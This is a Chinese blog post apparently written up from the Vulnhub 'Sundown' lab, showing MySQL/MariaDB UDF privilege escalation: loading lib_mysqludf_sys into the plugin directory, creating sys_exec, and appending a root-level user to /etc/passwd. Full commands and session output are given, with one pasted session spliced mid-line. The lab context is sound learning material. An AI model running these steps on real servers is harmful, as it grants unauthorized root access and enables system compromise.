2. 程式人生 > 其它 >利用Mysql提權的步驟以及一種低階錯誤的說明

利用Mysql提權的步驟以及一種低階錯誤的說明

阿新 發佈:2022-12-12

利用Mysql提權的步驟以及一種低階錯誤的說明

通過一些方式獲取了目標主機mysql的使用者名稱和密碼,這時我們想通過mysql來執行系統命令,此時我們可以考慮使用UDF進行提權。需要提前將lib_mysqludf_sys_64.so檔案(Kali linux上有該檔案)上傳至靶機/tmp目錄下。然後連線資料庫。另外需要提前生成具有root許可權的使用者的密碼:

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo openssl passwd -1 -salt bob 123456   
$1$bob$7Llv2KscjOtcMna9mt7Ps0

目標就是將bob(具有root許可權)追加到/etc/passwd檔案中去,即:

bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash

然後在資料庫中進行如下步驟:

第一步:use mysql;

第二步:建立新表: create table potato(line blob);

第三步:插入外掛:insert into potato values(load_file(‘/tmp/lib_mysqludf_sys_64.so’));

     SHOW VARIABLES LIKE ‘%plugin%’;

select * from potato into dumpfile
‘/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so’;

create function sys_exec returns integer soname ‘lib_mysqludf_sys_64.so’;

接下來,在進入插入使用者名稱密碼過程中犯了一個低階錯誤,即

select sys_exec('echo "bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');

雙引號在裡面導致美元符號會被解釋,從而密碼驗證的時候會不對,導致驗證失敗。

如下所示:

MariaDB [mysql]>  select sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
|                                                                                0 |
+----------------------------------------------------------------------------------+
1 row in set (0.001 sec)

MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ su - jason
Password: 
su: Authentication failure

其實只需將sys_exec命令的單引號與雙引號互換即可正確執行,完整過程如下:

carlos@sundown:/tmp$ mysql -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 161571
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> create table potato(line blob);
Query OK, 0 rows affected (0.009 sec)

MariaDB [mysql]> insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.003 sec)

MariaDB [mysql]>  SHOW VARIABLES LIKE ‘%plugin%’;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '‘%plugin%’' at line 1
MariaDB [mysql]>  SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)

MariaDB [mysql]> select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.000 sec)

MariaDB [mysql]>  create function sys_exec returns integer soname 'lib_mysqludf_sys_64MariaDB [mysql]> select sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd");
+--------------------------------------------------------------------------------------------------------+
| sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd") |
+--------------------------------------------------------------------------------------------------------+
|                                                                                                      0 |
+--------------------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)

MariaDB [mysql]>carlos@sundown:/tmp$ su - bob
Password: 
root@sundown:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sundown:~# ls -alh
total 28K
drwx------  3 root root 4.0K Aug  3  2020 .
drwxr-xr-x 18 root root 4.0K Aug  3  2020 ..
lrwxrwxrwx  1 root root    9 Aug  3  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Aug  3  2020 .local
lrwxrwxrwx  1 root root    9 Aug  3  2020 .mysql_history -> /dev/null
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 1.3K Aug  3  2020 proof.txt
-rw-r--r--  1 root root   66 Aug  3  2020 .selected_editor
root@sundown:~# cat proof.txt
                              _____,,,\//,,\\,/,
                             /-- --- --- -----
                            ///--- --- -- - ----
                           o////- ---- --- --
                           !!//o/---  -- --
                         o*) !///,~,,\\,\/,,/,//,,
                           o!*!o'(\          /\
                         | ! o ",) \/\  /\  /  \/\
                        o  !o! !!|    \/  \/     /
                       ( * (  o!'; |\   \       /
                        o o ! * !` | \  /       \
                       o  |  o 'o| | :  \       /
                        *  o !*!': |o|  /      /
                            (o''| `| : /      /
                            ! *|'`  \|/       \\
                           ' !o!':\  \\        \
                            ( ('|  \  `._______/
////\\\,,\///,,,,\,/oO._*  o !*!'`  `.________/
  ---- -- ------- - -oO*OoOo (o''|           /
    --------  ------ 'oO*OoO!*|'o!!          \
-------  -- - ---- --* oO*OoO *!'| '         /
 ---  -   -----  ---- - oO*OoO!!':o!'       /
 - -  -----  -  --  - *--oO*OoOo!`         /
   \\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC

510252fabb4b7e7dddd7373b7b3da3e8

Thanks for playing - Felipe Winsnes (@whitecr0wz)
root@sundown:~# 
 quit
.so';
Query OK, 0 rows affected (0.000 sec)

相關推薦

利用Mysql步驟以及低階錯誤的說明

利用Mysql提權步驟以及一種低階錯誤的說明 通過一些方式獲取了目標主機mysql的使用者名稱和密碼,這時我們想通過mysql來執行系統命令,此時我們可以考慮使用UDF進行提權。需要提前將lib_mysqludf_sys_64.so檔案(K

mysql的安全漏洞的現象,就是利用轉義字元把 ' ' 化沒了,然後true 起作用啦

mysql的安全漏洞的現象,就是利用轉義字元把 \' \' 化沒了,然後true 起作用啦

Mysql-基於Mysql的UDF(Linux系統)

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

Mysql-基於Mysql的UDF(Windows系統)1

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

Mysql-基於Mysql的webshell

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

Mysql-基於Mysql的UDF(Windows系統)2

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

mysql之udf

UDF UDF(user defined function)使用者自定義函式,是mysql的一個拓展介面。使用者可以通過自定義函式實現在mysql中無法方便實現的功能,其新增的新函式都可以在sql語句中呼叫。 它有3返回值,這三分別是

MySql 死鎖時的解決辦法

問題:   某條資料一直開啟事物,沒有提交,一直鎖定狀態。   解決: 檢視innodb的事務表INNODB_TRX,看下里面是否有正在鎖定的事務執行緒,看看ID是否在show full processlist裡面的sleep執行緒中,如果是,

Mysql(二)---UDF

零、參考連結 https://www.sqlsec.com/2020/11/mysql.html#toc-heading-10 、原理 UDF是mysql的一個拓展介面,UDF(Userdefined function)可翻譯為使用者自定義函式,這個是用來拓展Mysql的技術手段。

Mysql(三)---MOF

、原理 利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 檔案,每分鐘都會在一個特定的時間去執行次的特性,來寫入我們的cmd命令使其被帶入執行,以系統許可權執行

Raven2靶機、Mysql

Raven2靶機、Mysql Raven: 2 ~ VulnHub 資訊收集 Nmap掃埠 80埠資訊 一個.DS_Store檔案洩露(好像沒什麼用)、一個vendor資料夾和一個登陸後臺頁面

【域滲透】利用S4U2self

利用場景 當獲取域內機器許可權,許可權為iis、Network Service等許可權,就可以利用S4u2Self進行許可權提升,儘管要在帳戶上專門啟用約束委派才能使用S4U2proxy 跨系統“使其工作”,但任何具有 SPN 的主體都可

Windows總結()——資料庫與系統漏洞

Windows總結() Windows總結(1)——資料庫與系統漏洞 0x01 核心漏洞

MySQL之啟動項——開機啟動的程式,那時候啟動的程式許可權都是system

關於MySQL的啟動項提權,聽其名知其意。就是將段 VBS指令碼匯入到 C:\\Documents and Settings\\All Users\\「開始」選單\\程式\\啟動 下,如果管理員重啟了伺服器,那麼就會自動呼叫該指令碼,並執行其中的使用者

安芯網盾:高階威脅之ROP攻擊篇——利用記憶體破壞型漏洞的常用技術,rop攻擊的程式主要使用棧溢位的攻擊方法

安芯網盾:高階威脅之ROP攻擊篇 安芯網盾  2021-10-26 11:21:28 4130 在資訊保安的江湖,始終存在著兩個派系:攻擊方和防守方。攻擊方總想嚐盡一切辦法去突破防守方的防線,防守方則始終嚴防死守、做好安

OpenAI釋出8個模擬機器人環境以及HER實現,以訓練實體機器人模型

OpenAI:我們將釋出8個模擬的機器人環境,以及一種叫做“事後經驗回顧”(Hindsight Experience Replay,簡稱HER)的一種Baselines實現,它允許從簡單的、二元的獎勵中學習,從而避免了對複雜的獎勵工程的需求。所有

Kali虛擬機器利用msf17-010執行RCE(針對Windows Server 2008以及2003)

寫在前面: 老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本,否則拿這個去攻擊Windows Server 2

詳解MYSQL中重新命名procedure的方法

  最近有用到對儲存過程(procedure)重新命名的功能,在網上找了一下資料都沒有講到在mysql中是如何實現的,當然可以刪掉再重建,但是應該有別的方法,在“mysql”這個資料庫(自帶)中找了一下,發現兩張表:func、

次WindowsServer2012 - 爛土豆

Emm Shell都好久了 操 最近好鐵鐵又喊我來 因為自己不怎麼會,最近學了一點 放了學就回家抓緊吃完飯開始

Mysql UDF方法

0x01 UDF UDF(user defined function)使用者自定義函式,是mysql的一個拓展介面。使用者可以通過自定義函式實現在mysql中無法方便實現的功能,其新增的新函式都可以在sql語句中呼叫,就像呼叫本機函式一樣。